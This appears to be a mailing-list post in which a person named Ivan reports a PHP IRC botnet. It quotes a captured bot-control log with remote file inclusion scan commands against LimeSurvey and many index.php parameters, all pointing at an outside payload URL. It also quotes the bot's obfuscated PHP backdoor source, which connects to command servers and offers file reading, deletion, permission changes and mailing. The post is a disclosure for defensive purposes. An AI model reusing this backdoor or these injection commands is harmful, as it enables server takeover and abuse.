202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php LimeSurvey /classes/core/language.php?
rootdir=http://holegirl.h18.ru/images/cs.txt? 5 50 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/a.php You+have+not
+provided+a+survey+identification+number /classes/core/language.php?
rootdir=http://holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?cmd=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?c=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?ss=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?sa=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?main=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/m.php index.php? /
index.php?login=http://holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?l=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.*.? /?=http://holegirl.h18.ru/images/cs.txt?
5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php ? /?=http://holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/a.php "?" /?=http://holegirl.h18.ru/images/cs.txt? 5 50 -
s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?register=http://
holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?reg=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?about_us=http://
holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?aboutus=http://
holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?prods=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?prod=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?product=http://
holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?global=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?glob=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?shout=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?shoutbox=http://
holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php listen.pls? /listen.pls?=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php listen.pls? /listen.pls?song==http://
holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php listen.pls? /listen.pls?song==http://
holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php listen.pls? /listen.pls?song=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php listen.pls? /listen.pls?trk=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/a.php listen.pls? /listen.pls?track=http://
holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av QUIT :Ping timeout

----------------- END -------------------

Please, make your decisions, and help to stop this idiocy.

Thank You,
Ivan

PS: If you think they should be busted and punished, feel free to pass
this info to appropriate authorities. :)

> [cs.new.txt]<?
> set_time_limit(0);
> ini_set("max_execution_time",0);
> set_magic_quotes_runtime(0);
> ini_set('output_buffering',0);
> error_reporting(0);
> ignore_user_abort();
> $settings = array
> (
> "port" => 8080,
> "serverpassword" => "qdDN3pjgpsvfpw==", //secretpass
> "channel" => "WY7a", //##p
> "channel_password" => "o8+f1JTfng==", //md5hash
> "hostaddress_ereg" => "OiohKkAqLmF2", //:*!*@*.av
> "ha" => "OiohKkAqLmF2", //
> "bot_password" => "9dd4e461268c8034f5c8564e155c67a6",
> /**This is irc-bot password 9dd4e461268c8034f5c8564e155c67a6
> *login is in a PRIVMSG to a bot "* 9dd4e461268c8034f5c8564e155c67a6" but your hostaddress must match the ":*!*@*.av" ereg
> *basically you just need to have 'av' in your hostname, the :*!*@ part is just IRC name/nick and * and . matches anything.
> **/
> "tr" => "*",
> "length_nick_user" => 9,
> "mode" => "LXggaQ==", //-x i
> "ctcp_version" => "bUlSQyA2LjIxIEJZIEtoYWxlZCBNYXJkYW0tQmF5" //mIRC 6.21 BY Khaled Mardam-Ba
> );
>
> function Trimming($string) {
> $string = str_replace(" ", "", $string);
> return $string;}
>
> function Base64Decode($string) {
> $string = base64_decode(Trimming($string));
> return $string;}
>
> function RunApplication() {
> global $settings;
> $nee11cbb1 = array();
> $nothing = "";
> $servers = array("rdCd2p/RqtLYldmZZOGY0c6jqZqWo9k=", "ptjf2qjarMzRptmqo5iq0c+ZpN9hl9vY", "rdDM2p/Uqt7cZONlZOGY0c6jqZqWo9k=", "pN6bnGHbpt7hp5mjqw==", "pN6bnWHbpt7hp5mjqw==", "pN6bnmHbpt7hp5mjqw==", "pN6bn2Hbpt7hp5mjqw==", "npvdnKacZuHRZN1lrZqqms2fmJqhmeA=", "mpvOnKbWqc7Wn9Wgopyd39SgmtKmmNKZzdDOldnP2A==", "pp7a45jen9nhq9CnaJ1nnp1poNebn9bT1NHfz8/Lks/dzJnamt4=", "Zp2Y3KXVrN3RpuGaqJiW29c=", "ppnX5ZnbpczNppmepNCi");
> /**
> Servers are:
> we3nlethland.weedns.com
> pmununvbernum.weedns.com
> webnlhttp0x0.weedns.com
> ns10.optus.nu
> ns11.optus.nu
> ns12.optus.nu
> ns13.optus.nu
> h0s0s00we0r0w0w.cjb.net
> d0d0sjsdjkjkl2jsjkdfsdf.cjb.net
> p3pweriouwer234234jkhkjhjkshda.cjb.net
> 02.privserver.com
> p.myfoobar.info
>
> REMEMBER TO USE PORT 8080 AND SERVER PASSWORD OF 'secretpass' TO CONNECT!
> **/
> shuffle($servers);
> if(($connection = fsockopen(DecryptString($servers[0]),$settings['port'],$h70106d0d,$x809b1abe,15))) {
> $irc_name = RandomName($settings['length_nick_user']);
> if (strlen($settings['sp'])>0) {
> SendData($connection, "PASS ".DecryptString($settings['sp']));}
>
> SendData($connection, "USER ".RandomCharacters($settings['length_nick_user'])." 127.0.0.1 localhost :$irc_name");
> SendData($connection, "NICK $irc_name");
> while (!feof($connection)) {
> $trimmed_connection = trim(fgets($connection,512));
> $RecievedDataString = explode(" ",$trimmed_connection);
> if(($trimmed_connection == $nothing)) continue;
> if (isset($RecievedDataString[0]) && $RecievedDataString[0] == "PING") {
> SendData($connection, "PONG ".$RecievedDataString[1]);}
>
> else if (isset($RecievedDataString[1]) && $RecievedDataString[1] == 001) {
> SendData($connection, "MODE $irc_name ".Base64Decode($settings['mode']));
> SendData($connection, "JOIN ".DecryptString($settings['channel'])." ".DecryptString($settings['channel_password']));}
>
> else if(isset($data_array[1]) && $data_array[1] == 433)
> {
> SendData($connection, "NICK $irc_name");}
>
> else if (isset($RecievedDataString[1]) && isset($nee11cbb1[$RecievedDataString[1]])) {
> unset($nee11cbb1[$RecievedDataString[1]]);}
>
> else if (isset($RecievedDataString[1]) && ($RecievedDataString[1] == "PRIVMSG" || $RecievedDataString[1] == 332)) {
> $data = strstr($trimmed_connection," :");
> $data = substr($data,2);
> $data_array = explode(" ",$data);
> $sender_details = $RecievedDataString[0];
> $ctcp_sender = explode("!",$sender_details);
> $ctcp_sender = substr($ctcp_sender[0],1);
> $is_bot_admin = FALSE;
> if ($data_array[0] == "\1VERSION\1") {
> SendData($connection,"NOTICE ".$ctcp_sender." :\1VERSION ".Base64Decode($settings['ctcp_version'])."\1");
> }
> for ($count=0;$count<count($data_array);$count++) {
> if($data_array[$count] == "-s") {
> $is_bot_admin = TRUE;
> }
> }
> if ($RecievedDataString[1] == 332) {
> $other_nick = $RecievedDataString[3];
> }
> elseif ($RecievedDataString[2] == $irc_name) {
> $other_nick = $ctcp_sender;
> } else {
> $other_nick = $RecievedDataString[2];
> }
> if ($data_array[0] == PHP_OS) {
> array_shift($data_array);
> }
> if (substr($data_array[0],0,1) == $settings['tr']) {
> if (isset($nee11cbb1[$sender_details]) || $RecievedDataString[1] == "332") {
> switch (substr($data_array[0],1)) {
> case "lo":
> if ($RecievedDataString[1] != 332) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "out");}
>
> break;
> case "d1enow":
> SendData($connection, "QUIT :I QUIT");
> fclose($connection);
> exit(0);
> break;
> case "raw":
> if (count($data_array)>1) {
> SendData($connection, substr($data,strlen($data_array[0])));}
>
> break;
> case "ls":
> if (isset($data_array[1])) {
> $h954eef6d = $data_array[1];} else {
>
> $h954eef6d = getcwd();}
>
> if (is_dir($h954eef6d)) {
> if (($b73600783 = opendir($h954eef6d))) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "Dir// Now listing: \2".$h954eef6d."\2");
> while (($v435ed7e9 = readdir($b73600783)) !== FALSE) {
> if ($v435ed7e9 != "." && $v435ed7e9 != "..") {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "> (".filetype($h954eef6d."/".$v435ed7e9).") $v435ed7e9");
> sleep(1);}
> }
> closedir();
> } else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "Dir// Unable to list contents of \2".$h954eef6d."\2");}
> } else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "Dir// \2".$h954eef6d."\2 is not a dir!");}
>
> break;
> case "cat":
> if (count($data_array) > 1) {
> if (is_file($data_array[1])) {
> if (($f0666f0ac = fopen($data_array[1],"r"))) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "CAT// Now reading file: \2".$data_array[1]."\2");
> while(!feof($f0666f0ac)) {
> $b6438c669 = trim(fgets($f0666f0ac,256));
> PrivateMessage($connection, $is_bot_admin, $other_nick, "> $b6438c669");
> sleep(1);}
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "> [EOF]");} else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "CAT// Couldn't open \2".$data_array[1]."\2 for reading.");}
> } else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "CAT// \2".$data_array[1]."\2 is not a file");}
> }
>
> break;
> case "pwd":
> PrivateMessage($connection, $is_bot_admin, $other_nick, "PWD// Current dir: ".getcwd());
> break;
> case "cd":
> if (count($data_array) > 1) {
> if (chdir($data_array[1])) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "CD// Changed dir to ".$data_array[1]);} else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "CD// Failed to change dir");}
> }
>
> break;
> case "rm":
> if (count($data_array) > 1) {
> if (unlink($data_array[1])) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "RM// Deleted \2".$data_array[1]."\2");} else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "RM// Failed to delete \2".$data_array[1]."\2");}
> }
>
> break;
> case "touch":
> if (count($data_array) > 1) {
> if (touch($data_array[1])) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "Touch// Touched \2".$data_array[1]."\2");} else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "Touch// Failed to touch \2".$data_array[1]."\2");}
> }
>
> break;
> case "symlink":
> if (count($data_array) > 2) {
> if (symlink($data_array[1],$data_array[2])) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "SymLink// Symlinked \2".$data_array[2]."\2 To \2".$data_array[1]."\2");} else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "SymLink// Failed to link \2".$data_array[2]."\2 To \2".$data_array[1]."\2");}
> }
>
> break;
> case "chown":
> if (count($data_array) > 2) {
> if (chown($data_array[1],$data_array[2])) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "Chown// Chowned \2".$data_array[1]."\2 To \2".$data_array[2]."\2");} else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "Chown// Failed to chown \2".$data_array[1]."\2 To \2".$data_array[2]."\2");}
> }
>
> break;
> case "chmod":
> if (count($data_array) > 2) {
> if(chmod($data_array[1],$data_array[2])) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "Chmod// Chmodded \2".$data_array[1]."\2 with permissions \2".$data_array[2]."\2");} else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "Chmod// Failed to chmod \2".$data_array[1]."\2");}
> }
>
> break;
> case "mkdir":
> if (count($data_array) > 1) {
> if (mkdir($data_array[1])) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "MKDir// Created directory \2".$data_array[1]."\2");} else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "MKDir// Failed to create directory \2".$data_array[1]."\2");}
> }
>
> break;
> case "rmd":
> if (count($data_array)>1) {
> if (rmdir($data_array[1])) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "RMDir// Removed directory \2".$data_array[1]."\2");} else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "RMDir// Failed to remove directory \2".$data_array[1]."\2");}
> }
>
> break;
> case "cp":
> if (count($data_array) > 2) {
> if (copy($data_array[1], $data_array[2])) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "CP// Copied \2".$data_array[1]."\2 to \2".$data_array[2]."\2");} else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "CP// Failed to copy \2".$data_array[1]."\2 to \2".$data_array[2]."\2");}
> }
>
> break;
> case "mail":
> if (count($data_array)>4) {
> $y099fb995 = "From: <".$data_array[2].">\r\n";
> if (mail($data_array[1], $data_array[3], substr($data,$data_array[4]), $y099fb995)) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "Mailer// Message sent to \2".$data_array[1]."\2");} else {
>
> PrivateMessage($connection, $is_bot_admin, $other_nick, "Mailer// Send failure");}
> }
>
> break;
> case "mkmd5":
> PrivateMessage($connection, $is_bot_admin, $other_nick, "MD5// ".md5($data_array[1]));
> break;
> case "dns":
> if (isset($data_array[1])) {
> $p957b527b = explode(".",$data_array[1]);
> if (count($p957b527b)==4 && is_numeric($p957b527b[0]) && is_numeric($p957b527b[1]) && is_numeric($p957b527b[2]) && is_numeric($p957b527b[3])) {
> PrivateMessage($connection, $is_bot_admin, $other_nick, "DNS// ".$data_array[1]." -> ".gethostbyaddr($data_array[1]));
>
> }
>
> ...
>
> продолжение

Reply all
Reply to author
Forward
0 new messages